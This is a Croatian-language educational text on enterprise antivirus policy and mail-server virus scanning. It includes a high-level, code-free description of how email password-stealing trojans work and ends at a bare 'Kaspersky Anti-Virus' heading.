Opasnost od zaraze računarskih mreža stvarna je za svako poduzeće, ali epidemija virusa može dobiti pravi razvoj u lokalnim mrežama velikih ekonomskih i industrijskih kompleksa s geografski opsežnom infrastrukturom. Njihove su računarske mreže u pravilu nastajale u fazama, koristeći različit hardver i softver. Očigledno, za takva preduzeća, pitanje zaštite od virusa postaje vrlo teško, ne samo u tehničkom, već i u finansijskom smislu.

Istovremeno, rješenje ovog problema postiže se kombinacijom organizacijskih mjera i softverskih i hardverskih rješenja. Ovaj pristup ne zahtijeva velike tehničke i neposredne financijske troškove, a može se koristiti za sveobuhvatnu antivirusnu zaštitu lokalne mreže bilo kojeg poduzeća.

Takav sistem zaštite od virusa može se zasnivati ​​na sljedećim principima:

Načelo provođenja jedinstvene tehničke politike pri opravdavanju izbora antivirusnih proizvoda za različite segmente lokalne mreže;

Načelo potpunosti pokrivenosti cijele lokalne mreže organizacije sistemom zaštite od virusa;

Princip stalne kontrole lokalne mreže preduzeća za pravovremeno otkrivanje računarske infekcije;

Načelo centraliziranog upravljanja zaštitom od virusa;

Princip implementacije jedinstvene tehničke politike predviđa upotrebu samo antivirusnog softvera koji preporučuje odjel za zaštitu od virusa preduzeća u svim segmentima lokalne mreže. Ova politika je dugoročne prirode, odobrila ju je uprava kompanije i osnova je za ciljano i dugoročno planiranje troškova za kupovinu antivirusnih softverskih proizvoda i njihovo daljnje ažuriranje.

Načelo potpunosti pokrivenosti sistemom za zaštitu od virusa lokalne mreže predviđa postupno uvođenje softvera za zaštitu od virusa u mrežu do potpunog zasićenja u kombinaciji s organizacijskim i režimskim mjerama zaštite podataka.

Načelo kontinuiranog praćenja antivirusnog stanja lokalne mreže podrazumijeva takvu organizaciju njezine zaštite, koja pruža stalnu mogućnost praćenja stanja mreže radi otkrivanja virusa.

Princip centraliziranog upravljanja zaštitom od virusa predviđa upravljanje sistemom s jednog tijela koristeći hardver i softver. To tijelo organizira centraliziranu kontrolu u mreži, prima kontrolne podatke ili korisničke izvještaje sa svojih radnih mjesta o otkrivanju virusa i osigurava implementaciju donete odluke Zaštita od virusa lokalne mreže velike organizacije kompleksan je problem koji se ne svodi na jednostavnu instalaciju antivirusnih proizvoda. U pravilu je potrebno stvoriti poseban podsistem. Tehnički gledano, pri rješavanju ovog problema posebnu pažnju treba posvetiti testiranju svih novonabavljenih antivirusnih programa, kao i instaliranju antivirusnih paketa na poslužitelje pošte. 3 Antivirusni softver za servere pošte

Ako je u osvit razvoja računalnih tehnologija glavni kanal za širenje virusa bila razmjena programskih datoteka putem disketa, danas dlan pripada e-pošti. E -pošta je zgodan i neophodan alat poslovna komunikacija... Međutim, većina virusa i neželjene pošte širi se putem e-pošte; to može biti kanal za curenje povjerljivih podataka. Svakodnevno se milijuni i milijuni poruka prenose njegovim kanalima, a mnoge od njih su zaražene virusima.

Nažalost, datoteke priloga poslane e-porukama također mogu biti izuzetno opasne po zdravlje vašeg računara. Koje su opasnosti datoteka priloga? Kao takva datoteka, korisniku se može poslati virus ili trojanski konj ili dokument u formatu Microsoft Office ( * .doc, * .xls) zaražen računarskim virusom. Pokretanjem rezultirajućeg programa za izvršavanje ili otvaranjem dokumenta za pregled, korisnik može pokrenuti virus ili instalirati trojanski program na svoje računalo. Štaviše, zbog pogrešnih postavki programa za poštu ili grešaka u njemu, datoteke priloga mogu se automatski otvoriti prilikom pregledavanja sadržaja primljenih poruka. U tom slučaju, ako ne poduzmete nikakve zaštitne mjere, bit će pitanje vremena kada će virusi ili drugi zlonamjerni softver ući u vaš računar. Mogući su i drugi pokušaji prodiranja u vaš računar putem e -pošte. Na primjer, mogu poslati poruku u obliku HTML dokumenta u koji je ugrađena trojanska ActiveX kontrola. Otvorivši takvu poruku, možete preuzeti ovaj element na svoje računalo, nakon čega će on odmah početi obavljati svoj posao E -mail trojan - Trojanci koji vam omogućuju da "izvučete" lozinke i druge podatke iz datoteka vašeg računala i pošaljete ih e-mail vlasniku. To mogu biti prijave i internetske lozinke davatelja usluga, lozinka iz poštanskog sandučića, lozinke ICQ i IRC itd. Za slanje pisma vlasniku putem pošte, trojanac kontaktira poslužitelj pošte web lokacije koristeći SMTP protokol (na primjer, na smtp.mail.ru). Nakon što prikupi potrebne podatke, trojanac će provjeriti jesu li podaci poslani. Ako nije, podaci se šalju i pohranjuju u registar. Ako su već poslana, tada se prethodno pismo izvlači iz registra i uspoređuje s trenutnim. Ako je došlo do bilo kakvih promjena u informacijama (pojavili su se novi podaci), tada se pismo šalje, a svježi podaci o lozinkama bilježe se u registar. Ukratko, ova vrsta trojanaca jednostavno prikuplja informacije, a žrtva možda neće ni pretpostaviti da su mu lozinke već poznate. Arhiva takvog trojanca obično sadrži 4 datoteke: uređivač servera (konfigurator), trojanski server, paker (lijepljenje) datoteka, priručnik za upotrebu. Kao rezultat rada mogu se utvrditi sljedeći podaci: 1) IP adresa računara žrtve; 2) detaljne informacije o sistemu (naziv računara i korisničko ime, Windows verzija , modem, itd.); 3) sve lozinke u predmemoriji; 4) sve postavke za telefonske veze, uključujući telefonske brojeve, podatke za prijavljivanje i lozinke; 5) lozinke sa ICQ -a; 6) broj posljednjih posjećenih web lokacija. Osim čisto administrativnih mjera , za borbu protiv virusa i drugih zlonamjernih programa, morate koristiti poseban antivirusni softver (antiviruse) .Za zaštitu od virusa koji se šire putem e-pošte, možete instalirati antiviruse na računare pošiljatelja i primatelja. Međutim, ova zaštita često nije dovoljna. Konvencionalni antivirusi instalirani na računarima korisnika Interneta dizajnirani su za skeniranje datoteka i ne znaju uvijek kako analizirati promet podataka e-pošte. Ako antivirus ne skenira automatski sve datoteke koje se otvore, tada virus ili trojanski konj mogu lako prodrijeti u zaštitu na disk računala. Osim toga, učinkovitost antivirusa uvelike ovisi o poštivanju pravila njegove upotrebe: potrebne za povremeno ažuriranje antivirusne baze podataka, korištenje ispravnih postavki antivirusnog skenera itd. Nažalost, mnogi vlasnici računara ne znaju pravilno koristiti antivirusni softver ili ne ažuriraju antivirusnu bazu podataka, što neizbježno dovodi do infekcije virusom. Shvaćajući hitnost problema širenja virusa putem e-pošte, mnoge kompanije nude posebne antivirusne programe programe za zaštitu poslužitelja pošte. Takvi antivirusi analiziraju tok podataka koji prolazi kroz poslužitelj pošte, sprječavajući prijenos poruka sa zaraženim datotekama privitaka. Postoji još jedno rješenje - povezivanje s poslužiteljima pošte konvencionalnih antivirusnih programa namijenjenih skeniranju datoteka.Zaštita od virusa SMTP i POP3 poslužitelja pošte mnogo je učinkovitija od antivirusne zaštite računala korisnika. U pravilu, iskusni administrator konfigurira antiviruse na poslužitelju, koji neće pogriješiti pri postavljanju, a osim toga omogućit će automatski način ažuriranja baze podataka putem Interneta. Korisnici sigurnih SMTP i POP3 servera ne moraju brinuti o glavnom kanalu distribucije virusa - primat će poruke koje su već očišćene od virusa. Radnje poštanskih servera prilikom slanja i primanja zaraženih poruka ovise o postavkama antivirusa i sam server pošte. Na primjer, kada pošiljatelj pokuša poslati poruku sa zaraženom datotekom, zaštićeni SMTP poslužitelj pošte će to odbiti, a program za poštu će prikazati poruku upozorenja. Ako neko pošalje poruku e -pošte s zaraženim privitkom datoteke, tada će se pri korištenju sigurnog POP3 servera poslati samo poruka o virusu. Uprkos konstantno rastućoj popularnosti platforme Microsoft Windows, danas većina internetskih poslužitelja koristi operativne sisteme Linux FreeBSD i slični sistemi slični UNIX-u. Glavna prednost Linuxa je njegova niska cijena nabavke. Svatko može preuzeti Linux distribuciju putem Interneta i instalirati je na bilo koji broj računara. Ova distribucija ima sve što vam je potrebno za izradu internetske stranice, uključujući poslužitelje e-pošte. Ostale prednosti Linuxa i sličnih operativnih sistema treba istaknuti otvorenost, dostupnost izvornog koda, prisutnost ogromne zajednice programera volontera koji su spremni pomoći teškim situacijama, jednostavan daljinski upravljač sa tekstualnom konzolom itd. Za OS ove serije stvoreno je samo nekoliko desetina virusa, što ukazuje na njegovu visoku sigurnost.

4 Kaspersky Anti-Virus

Pregledi